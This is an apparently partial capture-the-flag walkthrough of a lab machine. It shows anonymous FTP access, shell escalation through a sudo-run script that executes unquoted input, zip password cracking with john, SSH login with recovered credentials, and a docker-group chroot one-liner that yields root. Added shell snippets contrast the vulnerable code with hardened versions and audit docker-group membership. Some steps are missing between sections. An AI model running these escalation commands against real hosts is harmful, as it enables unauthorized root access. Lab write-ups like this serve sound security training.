Let's run a simple nmap scan against the target machine.
$ nmap -sC -sV 10.10.159.234
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-14 13:23 IST
Nmap scan report for 10.10.159.234
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.48.138
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
| 256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_ 256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Game Info
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.15 seconds
There are three open ports:

Port  Service
21    ftp
22    ssh
80    http
We can connect anonymously through FTP.
$ ftp anonymous@10.10.159.234
Connected to 10.10.159.234.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
There is a note.txt file that we can download to our machine using the get command.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||62537|)
150 Opening BINARY mode data connection for note.txt (90 bytes).
100% |***********************************************************************************************************************************************************************************************| 90 348.77 KiB/s 00:00 ETA
226 Transfer complete.
90 bytes received in 00:00 (0.68 KiB/s)
Let's cat out the note.txt file.
$ cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
So there is some page where we can input commands, and those commands are filtered before they run.
Let's find that page with gobuster.
Let's check which commands the www-data user can run with sudo.
www-data@ubuntu:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
Let's take a better look at what the .helpline.sh file does.
www-data@ubuntu:/home$ cat /home/apaar/.helpline.sh
cat /home/apaar/.helpline.sh
#!/bin/bash
echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo
read -p "Enter the person whom you want to talk with: " person
read -p "Hello user! I am $person, Please enter your message: " msg
$msg 2>/dev/null
echo "Thank you for your precious time!"
The script reads our message into $msg and then executes it: the line "$msg 2>/dev/null" expands the variable unquoted and runs the resulting words as a command, with stderr discarded. Whatever we type as the message is executed as the user the script runs as, and sudo lets www-data run this script as apaar without a password. Entering /bin/bash as the message should therefore give us a shell as apaar.
www-data@ubuntu:/var/www/files/images$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: knign
knign
Hello user! I am knign, Please enter your message: /bin/bash
/bin/bash
id
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
apaar@ubuntu:/var/www/files/images$
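The added example below is not part of the original writeup; it reproduces the command-execution sink from .helpline.sh in a function of its own next to a hardened replacement, so the difference between unquoted expansion and treating input as data is visible. Function names and the sample messages are mine.

```shell
#!/bin/sh
# Added example (not from the original writeup): the unquoted expansion in
# /home/apaar/.helpline.sh beside a hardened version. Function names are
# my own; the messages passed in are constructed inputs.

# Same sink as the real script: "$msg 2>/dev/null" expands $msg unquoted
# and runs the resulting words as a command. Word splitting happens, but
# shell syntax is NOT re-parsed: 'echo a|b' prints "a|b" literally and
# 'id; whoami' fails because "id;" is not a command. A plain command such
# as /bin/bash is enough, and under "sudo -u apaar" it runs as apaar.
vulnerable_helpline() {
    msg="$1"
    $msg 2>/dev/null
}

# Hardened: the message is data, never a command. printf with '%s' and a
# quoted variable cannot be turned into execution, whatever is typed.
hardened_helpline() {
    msg="$1"
    printf 'Message recorded: %s\n' "$msg"
}

# Demo with constructed inputs when run directly.
vulnerable_helpline 'id -u'        # runs id, prints the current uid
vulnerable_helpline 'echo a|b'     # prints "a|b": the pipe is a literal arg
hardened_helpline '/bin/bash'      # prints "Message recorded: /bin/bash"
```

The lesson for the script's author is the same as for any "command from user input" pattern: quote the variable and pass it to a program that treats it as an argument (printf, a logger, a file append), or do not execute it at all. A filter on strings, as the note.txt hints, is not a fix, because the unquoted expansion runs whatever survives the filter.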
$ john --wordlist=/usr/share/wordlists/rockyou.txt backup_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2023-12-14 15:18) 4.166g/s 51200p/s 51200c/s 51200C/s horoscope..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Let's unzip the file using the pass1word password.
We can now log in over SSH as the user anurodh with the password !d0ntKn0wmYp@ssw0rd.
$ ssh anurodh@10.10.159.234
The authenticity of host '10.10.159.234 (10.10.159.234)' can't be established.
ED25519 key fingerprint is SHA256:mDI9eoI+sD1gmuE1Vl2iLvyVIopHnZlbAEFxr82BFwc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.159.234' (ED25519) to the list of known hosts.
anurodh@10.10.159.234's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Dec 14 09:53:01 UTC 2023
System load: 0.08 Processes: 134
Usage of /: 24.8% of 18.57GB Users logged in: 0
Memory usage: 22% IP address for eth0: 10.10.159.234
Swap usage: 0% IP address for docker0: 172.17.0.1
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
19 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
anurodh@ubuntu:~$
Using the id command we can check the groups that the anurodh user is part of.
anurodh@ubuntu:~$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
So the anurodh user is a member of the docker group. Members of that group can talk to the Docker daemon, which runs as root, so they can start a container that mounts the host's root filesystem and chroot into it. GTFOBins lists this technique for docker:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
The GTFOBins entry is written for sudo; as a member of the docker group we can run it directly, without sudo.
anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
We are now the root user and can read the root flag.
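As an added example that is not part of the original writeup, here is a small audit helper for the finding above: it lists docker-group members from an /etc/group file and checks whether the current user can write the daemon socket, which is the capability the group actually grants. Function names and the sample /etc/group content are my own; the sample is constructed to match the gid 999 seen on the target.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit who can reach the
# Docker daemon, since that is equivalent to root on the host. Function
# names are mine; the sample group file below is constructed.

# Print the member list of the docker group from an /etc/group-format file.
docker_group_members() {
    awk -F: '$1 == "docker" { print $4 }' "$1"
}

# Exit 0 if the given user is listed in the docker group, 1 otherwise.
# Members are comma separated; -F and -x avoid regex and substring matches.
is_in_docker_group() {
    user="$1"; groupfile="$2"
    docker_group_members "$groupfile" | tr ',' '\n' | grep -qxF "$user"
}

# The real check on a live host: can this process write the daemon socket?
# If yes, the GTFOBins one-liner above works without sudo.
docker_socket_writable() {
    [ -w /var/run/docker.sock ]
}

# Constructed sample in /etc/group format (docker gid 999 as on the target).
SAMPLE_GROUP=$(mktemp)
cat > "$SAMPLE_GROUP" <<'EOF'
root:x:0:
sudo:x:27:
docker:x:999:anurodh
EOF

# Demo when run directly; on a real audit pass /etc/group instead.
docker_group_members "$SAMPLE_GROUP"          # prints: anurodh
if docker_socket_writable; then
    echo "docker socket is writable by $(id -un): host root is reachable"
fi
```

The fix on the host side is not to put untrusted users in the docker group at all; rootless Docker or a separate build host keeps the daemon's root privileges out of reach of ordinary accounts.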